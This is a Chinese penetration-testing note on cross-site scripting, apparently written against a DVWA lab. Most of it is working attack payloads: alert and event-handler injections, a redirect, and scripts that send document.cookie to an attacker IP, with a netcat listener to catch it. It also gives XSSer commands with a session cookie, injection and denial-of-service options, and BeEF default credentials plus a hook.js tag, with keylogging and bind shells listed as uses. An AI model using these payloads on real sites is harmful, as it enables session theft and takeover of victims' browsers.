【渗透测试笔记】之【XSS】_渗透测试为啥造成出现弹窗?

反射型（非持久型）

验证方法

观察网站是否原封不动地返回提交的数据

像这种就可能存在XSS 漏洞
再提交<>()"等敏感字符看是否会被转义

发现没有被转义

1.直接发送弹窗

提交

<script>alert('xss')</script>
1

弹窗

2.利用点击事件弹窗

提交

<a href=""onclick=alert('xss')>type</a>
1

当返回类容如果在<>标签内部，此时则不需要提交<>即可利用。
点击type，弹窗

3.利用错误事件弹窗

提交

<img src="http://192.168.1.1/a.jpg" onerror=alert('xss')>
1

直接弹窗

4.重定向

提交

<script>window.location="http://www.baidu.com"</script>
1

直接到百度首页

5.发送Cookie

<script>new Image().src="http://192.168.2.106/c.php?cookie="+document.cookie;</script>
1

获得cookie

也可以利用站点，将获取cookie 代码存与站点文件中，利用xss 访问站点文件。

DOM 型

侦听端口：

nc -vnlp 88
1

注入代码：

<script>var img=document.createElement("img");img.src="http://192.168.2.106:88/log?Cookie="+escape(document.cookie);</script>
1

存储型

多出现在留言板等位置
验证：

<script>alert('xss')</script>
1

其他方法与反射型验证基本一致，所不同的是会储存到服务器端，不是一次性的。

XSSER

安装：

apt install xsser -y
pip install BeautifulSoup
1
2

使用

图形化界面：

xsser --gtk
1

命令行：

xsser -u 'http://192.168.2.100/dvwa/vulnerabilities' -g '/xss_r/?name=XSS' --cookie='security=medium; PHPSESSID=18807a641e637b489336a75bffdd3080' -s -v
1

变量是String类型用XSS代替，int用X1S！！！
常用参数

-g：GET 方法（参数前面有一个路径）
-p：POST 方法
-s：统计提交次数
-v：显示详细信息
--heuristic：检查过滤字符
1
2
3
4
5

编码方式

--Str
--Une
--Mix
--Dec
--Hex
--Hes
--Dwo
--Doo
--Cem=‘Mix,Hex,Dec’
1
2
3
4
5
6
7
8
9

注入技术

--Coo：Cookie注入
--Xsa：Agent注入
--Xsr：Referer注入
--Dcp：数据控制协议注入
--Dom：Dom注入
--Ind：响应注入
--Anchor：Use 'Anchor Stealth' payloader (DOM shadows!)
--Phpids（利用Pphids0.6.5的BUG）
--Doss：服务器拒绝服务攻击
--Dos：客户端拒绝服务攻击
--B64：Base64 code encoding in META tag
--Onm：Use onMouseMove() event
--Ifr：Use <iframe> source tag
1
2
3
4
5
6
7
8
9
10
11
12
13

BEEF

• 默认账密:

/etc/beef-xss/config.yaml
1

credentials:
user:beef #用户名
passwd:beef #密码
1
2
3

kali默认：kali:kali

• HOOK:

<script src="http://192.168.2.106:3000/hook.js"></script>
1

• Details
  浏览器、插件版本信息；操作系统信息
• Logs
  浏览器动作：焦点变化、鼠标点击、信息输入
• Commands
  绿色：表示适用于该目标浏览器，并且执行结果被客户端不可见
  红色：不适用当前用户（不准）
  橙色：模块可用，但用户可见
  灰色：未在目标浏览器上测试过

用途

• 键盘记录器
• 网络扫描
• 浏览器信息收集
• 绑定shell
• 与metasploit 集成